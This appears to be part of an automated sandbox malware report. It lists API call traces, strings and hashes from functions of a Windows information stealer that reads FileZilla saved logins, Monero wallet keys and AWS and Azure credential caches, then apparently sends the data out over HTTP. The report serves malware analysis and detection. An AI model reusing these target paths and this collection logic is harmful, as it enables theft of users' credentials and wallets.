                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD0662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD0692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD06AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00AD06C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00AD06D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00AD06E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD06F3
                                      • lstrcat.KERNEL32(?,00AE1770), ref: 00AD0702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD0715
                                      • lstrcat.KERNEL32(?,00AE1774), ref: 00AD0724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00AD0733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD0746
                                      • lstrcat.KERNEL32(?,00AE1780), ref: 00AD0755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00AD0764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD0777
                                      • lstrcat.KERNEL32(?,00AE1790), ref: 00AD0786
                                      • lstrcat.KERNEL32(?,00AE1794), ref: 00AD0795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AE0DB7), ref: 00AD07EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: b2a34475d40261377d648956307316a59220a2f240e367ebb5a9958d492410cc
                                      • Instruction ID: 95849fe2e9dee20a67f64e1196d4ebc7d8f62adad052358763585a5fde62a0ef
                                      • Opcode Fuzzy Hash: b2a34475d40261377d648956307316a59220a2f240e367ebb5a9958d492410cc
                                      • Instruction Fuzzy Hash: B6D14176910208ABCB04EBF0DE96EEE7339AF24700F40855AF143B7295DF70AA45CB65
                                      Function 00AC59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AC5A48
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC5A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC5BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0154FD10,00000000,?,0154E800,00000000,?,00AE1B4C), ref: 00AC5EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00AC5ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00AC5EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC5EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00AC5EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00AC5F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AC5F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00AC5F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AC5F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00AC5F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6000
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC600D
                                      • HttpOpenRequestA.WININET(00000000,0154FCE0,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC5C48
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 7222783dad201ecb8f035d8e426836d5f4447bcb6fa8d1e2e22d047578f848a0
                                      • Instruction ID: 300eff11967e04fbcdf87600e55788873592a7ceca2d11eac15bba9c521560c6
                                      • Opcode Fuzzy Hash: 7222783dad201ecb8f035d8e426836d5f4447bcb6fa8d1e2e22d047578f848a0
                                      • Instruction Fuzzy Hash: 5C12CE72920118ABCB15EBA0DDA5FEEB379BF24700F00459BF14762291EF706E49CB65
                                      Function 00ACCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACD083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ACD1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00ACD1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD308
                                      • lstrcat.KERNEL32(?,00AE1570), ref: 00ACD317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD32A
                                      • lstrcat.KERNEL32(?,00AE1574), ref: 00ACD339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD34C
                                      • lstrcat.KERNEL32(?,00AE1578), ref: 00ACD35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD36E
                                      • lstrcat.KERNEL32(?,00AE157C), ref: 00ACD37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD390
                                      • lstrcat.KERNEL32(?,00AE1580), ref: 00ACD39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD3B2
                                      • lstrcat.KERNEL32(?,00AE1584), ref: 00ACD3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00ACD3D4
                                      • lstrcat.KERNEL32(?,00AE1588), ref: 00ACD3E3
                                        • Part of subcall function 00ADAB30: lstrlen.KERNEL32(00AC4F55,?,?,00AC4F55,00AE0DDF), ref: 00ADAB3B
                                        • Part of subcall function 00ADAB30: lstrcpy.KERNEL32(00AE0DDF,00000000), ref: 00ADAB95
                                      • lstrlen.KERNEL32(?), ref: 00ACD42A
                                      • lstrlen.KERNEL32(?), ref: 00ACD439
                                        • Part of subcall function 00ADAD80: StrCmpCA.SHLWAPI(00000000,00AE1568,00ACD2A2,00AE1568,00000000), ref: 00ADAD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACD4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 7f10323256ea296d858b50913cb222232bfffadce5e250d6d0c221cb93eb4b10
                                      • Instruction ID: bb11fbfd25b85473cde7bdc7db5209b19adfd18946815fb45c9381654644af72
                                      • Opcode Fuzzy Hash: 7f10323256ea296d858b50913cb222232bfffadce5e250d6d0c221cb93eb4b10
                                      • Instruction Fuzzy Hash: DCE13271920208ABCB04EBA0DE56EEE7379AF64301F00455AF147B72A1DF31AE49CB75
                                      Function 00ACCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0154D970,00000000,?,00AE1544,00000000,?,?), ref: 00ACCB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00ACCB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00ACCB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ACCBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ACCBD9
                                      • StrStrA.SHLWAPI(?,0154D9A0,00AE0B56), ref: 00ACCBF7
                                      • StrStrA.SHLWAPI(00000000,0154D838), ref: 00ACCC1E
                                      • StrStrA.SHLWAPI(?,0154E308,00000000,?,00AE1550,00000000,?,00000000,00000000,?,01548938,00000000,?,00AE154C,00000000,?), ref: 00ACCDA2
                                      • StrStrA.SHLWAPI(00000000,0154E388), ref: 00ACCDB9
                                        • Part of subcall function 00ACC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ACC971
                                        • Part of subcall function 00ACC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ACC97C
                                      • StrStrA.SHLWAPI(?,0154E388,00000000,?,00AE1554,00000000,?,00000000,015489A8), ref: 00ACCE5A
                                      • StrStrA.SHLWAPI(00000000,01548B18), ref: 00ACCE71
                                        • Part of subcall function 00ACC920: lstrcat.KERNEL32(?,00AE0B47), ref: 00ACCA43
                                        • Part of subcall function 00ACC920: lstrcat.KERNEL32(?,00AE0B4B), ref: 00ACCA57
                                        • Part of subcall function 00ACC920: lstrcat.KERNEL32(?,00AE0B4E), ref: 00ACCA78
                                      • lstrlen.KERNEL32(00000000), ref: 00ACCF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00ACCF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: bb0e273897e536c16ab93d8c926944934e3a86706005235a68e576b3895077c9
                                      • Instruction ID: a687b86aedcfc9a67e3f750533dfcdaca9bc89567c50981702486625337710ce
                                      • Opcode Fuzzy Hash: bb0e273897e536c16ab93d8c926944934e3a86706005235a68e576b3895077c9
                                      • Instruction Fuzzy Hash: 36E1CF72910108ABCB14EBE4DDA5FEEB779AF64300F00459BF147A7291EF306A49CB65
                                      Function 00AD84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,0154BB90,00000000,00020019,00000000,00AE05BE), ref: 00AD8534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AD85B6
                                      • wsprintfA.USER32 ref: 00AD85E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AD860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD8629
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 7655b44d1f410fa5328c46120d2924f00c56f610d8add1e0ff8d3f0c2c65776c
                                      • Instruction ID: 1508dd2793899d79493b8c586e0ccbb2fb4b49ca1cbd795622f5fb9121710a0f
                                      • Opcode Fuzzy Hash: 7655b44d1f410fa5328c46120d2924f00c56f610d8add1e0ff8d3f0c2c65776c
                                      • Instruction Fuzzy Hash: A1812D71910218ABDB24DB54CD95FEA77B8FF18700F1086DAE10AA6240DF746F85CFA0
                                      Function 00AD4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD5000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00AD501D
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4B7C
                                        • Part of subcall function 00AD4B60: FindFirstFileA.KERNEL32(?,?), ref: 00AD4B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00AD50A9
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC4), ref: 00AD4BC1
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC8), ref: 00AD4BD7
                                        • Part of subcall function 00AD4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00AD4DCD
                                        • Part of subcall function 00AD4B60: FindClose.KERNEL32(000000FF), ref: 00AD4DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD5118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00AD5135
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4C00
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE08D3), ref: 00AD4C15
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4C32
                                        • Part of subcall function 00AD4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00AD4C6E
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,0154FBF0), ref: 00AD4C9A
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,00AE0FE0), ref: 00AD4CAC
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,?), ref: 00AD4CC0
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,00AE0FE4), ref: 00AD4CD2
                                        • Part of subcall function 00AD4B60: lstrcat.KERNEL32(?,?), ref: 00AD4CE6
                                        • Part of subcall function 00AD4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00AD4CFC
                                        • Part of subcall function 00AD4B60: DeleteFileA.KERNEL32(?), ref: 00AD4D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 5cbbe0d9287a3dfc1519c1a0d879a48c45845762ea6eb081660fb43303811111
                                      • Instruction ID: 0b394ea86e4c9c7b86a13b2baf29a018655c56517e7475d8e00e725cd0816451
                                      • Opcode Fuzzy Hash: 5cbbe0d9287a3dfc1519c1a0d879a48c45845762ea6eb081660fb43303811111
                                      • Instruction Fuzzy Hash: D641B57AA5031877DB10F770ED57FDD3328AB64700F404895B18AA61C2EEB5A7C88B92
                                      Function 00AD91A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AD91FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
